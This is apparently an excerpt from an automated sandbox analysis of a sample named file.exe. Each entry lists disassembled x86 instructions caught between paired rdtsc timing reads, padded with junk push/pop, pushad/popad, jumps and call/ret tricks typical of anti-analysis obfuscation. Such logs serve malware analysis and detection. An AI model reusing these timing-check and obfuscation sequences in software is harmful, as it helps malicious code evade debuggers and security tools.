Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38D7D second address: C38DED instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6268DAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F6268DAF3D4h 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 jg 00007F6268DAF3C6h 0x0000001d pop eax 0x0000001e jp 00007F6268DAF3C8h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 popad 0x00000027 pop eax 0x00000028 jp 00007F6268DAF3CCh 0x0000002e sub esi, dword ptr [ebp+122D2AAEh] 0x00000034 lea ebx, dword ptr [ebp+1244073Fh] 0x0000003a jl 00007F6268DAF3D3h 0x00000040 pushad 0x00000041 and ebx, 1AD2BC42h 0x00000047 and di, 1132h 0x0000004c popad 0x0000004d xchg eax, ebx 0x0000004e jno 00007F6268DAF3CAh 0x00000054 push eax 0x00000055 push ebx 0x00000056 jng 00007F6268DAF3CCh 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4B8A4 second address: C4B8AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C582FB second address: C58311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58311 second address: C5832C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F626941E964h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5832C second address: C5834A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6268DAF3CEh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F6268DAF3CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5834A second address: C58352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C584C4 second address: C584C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C584C8 second address: C584F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F626941E95Fh 0x0000000c pop edi 0x0000000d jmp 00007F626941E95Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C584F0 second address: C584F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58653 second address: C58670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626941E969h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58670 second address: C5867D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5867D second address: C58683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58683 second address: C58687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58687 second address: C5868B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5895C second address: C58968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6268DAF3C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C58F46 second address: C58F9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F626941E956h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F626941E968h 0x00000014 jmp 00007F626941E962h 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F626941E966h 0x00000020 je 00007F626941E956h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59105 second address: C59109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59109 second address: C5910F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5926B second address: C5926F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5926F second address: C59279 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F626941E956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4D1B2 second address: C4D1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59692 second address: C596A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E95Fh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C596A6 second address: C596DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jc 00007F6268DAF3C6h 0x00000012 jmp 00007F6268DAF3D0h 0x00000017 jno 00007F6268DAF3C6h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 jno 00007F6268DAF3CEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59E4D second address: C59E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59E53 second address: C59E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6268DAF3C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59E5F second address: C59E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59FA8 second address: C59FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6268DAF3C6h 0x0000000a jns 00007F6268DAF3C6h 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop esi 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007F6268DAF3CBh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 jmp 00007F6268DAF3D4h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A137 second address: C5A148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F626941E956h 0x00000009 jne 00007F626941E956h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A148 second address: C5A153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A153 second address: C5A161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626941E95Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A161 second address: C5A189 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6268DAF3C6h 0x00000008 jo 00007F6268DAF3C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop edi 0x00000018 jnl 00007F6268DAF3D0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A189 second address: C5A18F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A18F second address: C5A193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A4A9 second address: C5A4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A4AD second address: C5A4DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3CEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6268DAF3D7h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5A4DD second address: C5A4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jns 00007F626941E956h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2916B second address: C29181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6268DAF3CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5F1EA second address: C5F1EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5F1EE second address: C5F1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5F942 second address: C5F956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5F956 second address: C5F95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5FA8F second address: C5FA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5FA93 second address: C5FA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C663D4 second address: C663D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C663D9 second address: C663DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C66BAD second address: C66BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C66BB3 second address: C66BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C66BBF second address: C66BE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E961h 0x00000007 jmp 00007F626941E95Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69355 second address: C6935E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C694CE second address: C694D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C694D3 second address: C694D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69820 second address: C69825 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C698E7 second address: C698EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C698EB second address: C698F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C698F1 second address: C69903 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F6268DAF3C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69903 second address: C69907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C69DBB second address: C69DF0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6268DAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F6268DAF3C8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 adc esi, 23BAF3A8h 0x0000002d push eax 0x0000002e pushad 0x0000002f push ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6A1AF second address: C6A1C9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F626941E95Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6A2B9 second address: C6A2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6A36A second address: C6A397 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F626941E958h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D23BDh] 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F626941E95Ah 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007F626941E956h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6A958 second address: C6A9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F6268DAF3C8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F6268DAF3C8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d or dword ptr [ebp+122D1C43h], ecx 0x00000043 jne 00007F6268DAF3CEh 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push edx 0x0000004e call 00007F6268DAF3C8h 0x00000053 pop edx 0x00000054 mov dword ptr [esp+04h], edx 0x00000058 add dword ptr [esp+04h], 00000017h 0x00000060 inc edx 0x00000061 push edx 0x00000062 ret 0x00000063 pop edx 0x00000064 ret 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jc 00007F6268DAF3C8h 0x0000006e push esi 0x0000006f pop esi 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B3B0 second address: C6B3E5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F626941E956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov si, di 0x0000000f push 00000000h 0x00000011 call 00007F626941E963h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop esi 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2B8Ch], edi 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B3E5 second address: C6B3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6268DAF3C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B1C6 second address: C6B1E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E964h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F626941E956h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6DEC8 second address: C6DEE4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6268DAF3C6h 0x00000008 jmp 00007F6268DAF3D2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6DEE4 second address: C6DF1B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F626941E95Eh 0x00000008 jmp 00007F626941E966h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F626941E95Bh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6E529 second address: C6E53D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6E53D second address: C6E5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F626941E956h 0x00000009 je 00007F626941E956h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F626941E958h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007F626941E958h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 push ecx 0x0000004a mov edi, 18C46721h 0x0000004f pop edi 0x00000050 or edi, 4252B31Ah 0x00000056 push 00000000h 0x00000058 cmc 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F626941E964h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6E5BF second address: C6E5D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6268DAF3CCh 0x00000008 ja 00007F6268DAF3C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FBB5 second address: C6FBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FBBB second address: C6FBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FBC6 second address: C6FC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 nop 0x00000007 cld 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F626941E958h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jp 00007F626941E96Fh 0x0000002a jmp 00007F626941E969h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F626941E958h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b mov di, A71Ah 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F626941E963h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FC53 second address: C6FC5D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6268DAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6FC5D second address: C6FC68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F626941E956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7924B second address: C792B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007F6268DAF3D7h 0x0000000c push 00000000h 0x0000000e xor di, AB00h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F6268DAF3C8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jng 00007F6268DAF3C9h 0x00000035 movsx ebx, dx 0x00000038 adc di, 7844h 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f pushad 0x00000040 jnp 00007F6268DAF3C6h 0x00000046 push edx 0x00000047 pop edx 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C743DE second address: C743E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C75380 second address: C75384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C76285 second address: C7628F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F626941E956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7745B second address: C77505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F6268DAF3D1h 0x0000000f jmp 00007F6268DAF3CBh 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F6268DAF3C8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 sub bh, 00000038h 0x00000035 push dword ptr fs:[00000000h] 0x0000003c sub dword ptr [ebp+122D24A0h], eax 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F6268DAF3C8h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000018h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 mov edi, dword ptr [ebp+122D225Fh] 0x00000069 mov eax, dword ptr [ebp+122D13D5h] 0x0000006f stc 0x00000070 push FFFFFFFFh 0x00000072 jp 00007F6268DAF3CCh 0x00000078 mov ebx, dword ptr [ebp+122D2BC1h] 0x0000007e push eax 0x0000007f pushad 0x00000080 pushad 0x00000081 jo 00007F6268DAF3C6h 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
